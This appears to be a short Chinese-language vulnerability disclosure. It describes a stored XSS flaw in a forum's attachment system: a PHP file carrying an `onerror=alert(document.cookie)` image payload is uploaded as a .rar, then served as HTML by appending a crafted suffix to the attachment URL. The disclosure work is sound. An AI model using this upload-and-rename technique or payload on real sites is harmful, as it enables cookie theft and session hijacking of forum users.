### 简要描述:
看下面的说明
### 详细说明:
这是我在一个论坛上试的,先新建一个php文件,写入XSS代码:
```
<img src=1 onerror=alert(document.cookie)>
```
然后保存再将它的后缀名字改成.rar,然后上传附件。点击附件下载,提示即将下:
[<img src="https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg)
右键审查元素得到一个类似下面这样附件的地址(这里不是直接在帖子中得到地址而是通过下载提示之后):
```
http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91.html
```
### 漏洞证明:
好了!那么在这个地址后面加上这么一段
```
-request-文件名.php.html
```
如下:
```
http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91-request-se.php.html
```
当作html执行,XSS代码被触发!
[<img src="https://images.seebug.org/upload/201310/131437038736ac1e527a4d2831e1ae9e5948ca3f.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/131437038736ac1e527a4d2831e1ae9e5948ca3f.jpg)
暂无评论